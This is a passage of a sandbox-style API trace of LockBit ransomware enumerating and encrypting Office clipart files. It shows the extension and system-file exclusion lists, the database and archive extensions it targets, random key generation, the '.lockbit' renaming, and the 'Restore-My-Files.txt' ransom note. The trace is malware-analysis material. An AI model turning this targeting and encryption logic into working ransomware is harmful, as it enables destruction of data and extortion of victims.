PathFindExtensionW (pszPath="PH03011U.BMP") returned=".BMP" [0173.383] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0173.383] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0173.383] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0173.383] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0173.383] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0173.383] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0173.383] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0173.383] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0173.383] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0173.383] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0173.383] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0173.383] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0173.383] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0173.383] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0173.384] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0173.384] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0173.384] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0173.385] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0173.385] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0173.385] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0173.385] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0173.385] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0173.385] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0173.385] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH03011U.BMP") returned 1 [0173.385] lstrcmpiW (lpString1="ntldr", lpString2="PH03011U.BMP") returned -1 [0173.385] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH03011U.BMP") returned -1 [0173.385] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH03011U.BMP") returned -1 [0173.385] lstrcmpiW (lpString1="autorun.inf", lpString2="PH03011U.BMP") returned -1 [0173.385] lstrcmpiW (lpString1="thumbs.db", lpString2="PH03011U.BMP") returned 1 [0173.385] lstrcmpiW (lpString1="iconcache.db", lpString2="PH03011U.BMP") returned -1 [0173.385] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.385] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03011U.BMP") returned=".BMP" [0173.385] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0173.385] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0173.385] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0173.385] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0173.385] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0173.385] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0173.385] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0173.385] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0173.385] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0173.386] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0173.386] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0173.386] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0173.386] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0173.386] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0173.386] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0173.386] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0173.386] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0173.386] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0173.386] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0173.386] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0173.386] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0173.386] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0173.386] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0173.386] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0173.386] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0173.386] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0173.386] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0173.386] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0173.386] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03011U.BMP.lockbit") returned 72 [0173.386] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03011U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03011u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0173.388] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.388] malloc (_Size=0x40068) returned 0x3d70450 [0173.388] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=15478) returned 1 [0173.388] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.388] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0173.388] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.389] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.389] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0173.389] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0173.392] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03011U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03011U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.392] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.392] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.393] free (_Block=0x1fa2ed8) [0173.393] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03011U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.394] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.394] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.394] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa55b9c00, ftCreationTime.dwHighDateTime=0x1bd4e4b, ftLastAccessTime.dwLowDateTime=0x5a425410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa55b9c00, ftLastWriteTime.dwHighDateTime=0x1bd4e4b, nFileSizeHigh=0x0, nFileSizeLow=0x1016, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH03012U.BMP", cAlternateFileName="")) returned 1 [0173.394] lstrcmpiW (lpString1=".", lpString2="PH03012U.BMP") returned -1 [0173.394] lstrcmpiW (lpString1="..", lpString2="PH03012U.BMP") returned -1 [0173.394] PathFindExtensionW (pszPath="PH03012U.BMP") returned=".BMP" [0173.394] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0173.394] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0173.394] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0173.394] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0173.394] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0173.394] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0173.394] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0173.394] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0173.394] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0173.394] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0173.394] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0173.394] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0173.394] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0173.394] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0173.394] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0173.395] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0173.395] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0173.395] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0173.395] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0173.395] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0173.395] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0173.395] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0173.395] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0173.395] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0173.395] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0173.395] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0173.395] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0173.395] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0173.395] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0173.395] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0173.395] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0173.395] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0173.395] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0173.395] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0173.395] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0173.395] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0173.395] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0173.396] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0173.396] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0173.396] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0173.396] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0173.396] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0173.396] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0173.396] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0173.396] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0173.396] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0173.396] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0173.396] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH03012U.BMP") returned 1 [0173.396] lstrcmpiW (lpString1="ntldr", lpString2="PH03012U.BMP") returned -1 [0173.396] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH03012U.BMP") returned -1 [0173.396] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH03012U.BMP") returned -1 [0173.396] lstrcmpiW (lpString1="autorun.inf", lpString2="PH03012U.BMP") returned -1 [0173.396] lstrcmpiW (lpString1="thumbs.db", lpString2="PH03012U.BMP") returned 1 [0173.396] lstrcmpiW (lpString1="iconcache.db", lpString2="PH03012U.BMP") returned -1 [0173.396] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.396] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03012U.BMP") returned=".BMP" [0173.396] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0173.396] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0173.396] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0173.396] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0173.396] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0173.396] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0173.397] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0173.397] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0173.397] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0173.397] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0173.397] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0173.397] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0173.397] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0173.397] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0173.397] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0173.397] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0173.397] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0173.397] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0173.397] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0173.397] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0173.397] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0173.397] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0173.397] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0173.397] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0173.397] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0173.397] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0173.397] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0173.397] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0173.397] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03012U.BMP.lockbit") returned 72 [0173.397] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03012U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03012u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0173.398] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.398] malloc (_Size=0x40068) returned 0x3e70008 [0173.398] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=4118) returned 1 [0173.398] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.399] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0173.399] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.399] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0173.399] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0173.403] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03012U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03012U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.403] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.403] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.404] free (_Block=0x1fa2ed8) [0173.404] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03012U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.404] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.404] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.405] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc44dfa00, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x6cebbbb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc44dfa00, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x49d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH03014_.GIF", cAlternateFileName="")) returned 1 [0173.405] lstrcmpiW (lpString1=".", lpString2="PH03014_.GIF") returned -1 [0173.405] lstrcmpiW (lpString1="..", lpString2="PH03014_.GIF") returned -1 [0173.405] PathFindExtensionW (pszPath="PH03014_.GIF") returned=".GIF" [0173.405] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0173.405] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0173.405] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0173.405] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0173.405] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0173.405] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0173.405] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0173.405] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0173.405] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0173.405] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0173.405] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0173.405] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0173.405] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0173.405] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0173.405] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0173.405] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0173.405] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0173.405] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0173.405] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0173.405] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0173.405] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0173.405] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0173.406] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0173.406] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0173.406] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0173.406] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0173.406] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0173.406] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0173.406] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0173.406] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0173.406] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0173.406] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0173.406] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0173.406] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0173.406] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0173.406] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0173.406] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0173.406] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0173.406] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0173.406] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0173.406] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0173.406] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0173.406] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0173.406] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0173.406] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0173.406] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0173.406] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0173.406] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH03014_.GIF") returned 1 [0173.406] lstrcmpiW (lpString1="ntldr", lpString2="PH03014_.GIF") returned -1 [0173.406] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH03014_.GIF") returned -1 [0173.407] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH03014_.GIF") returned -1 [0173.407] lstrcmpiW (lpString1="autorun.inf", lpString2="PH03014_.GIF") returned -1 [0173.407] lstrcmpiW (lpString1="thumbs.db", lpString2="PH03014_.GIF") returned 1 [0173.407] lstrcmpiW (lpString1="iconcache.db", lpString2="PH03014_.GIF") returned -1 [0173.407] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.407] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03014_.GIF") returned=".GIF" [0173.407] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0173.407] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0173.407] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0173.407] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0173.407] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0173.407] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0173.407] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0173.407] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0173.407] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0173.407] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0173.407] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0173.407] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0173.407] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0173.407] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0173.407] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0173.407] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0173.407] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0173.407] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0173.407] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0173.407] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0173.408] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0173.408] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0173.408] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0173.408] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0173.408] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0173.408] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0173.408] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0173.408] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0173.408] wsprintfW 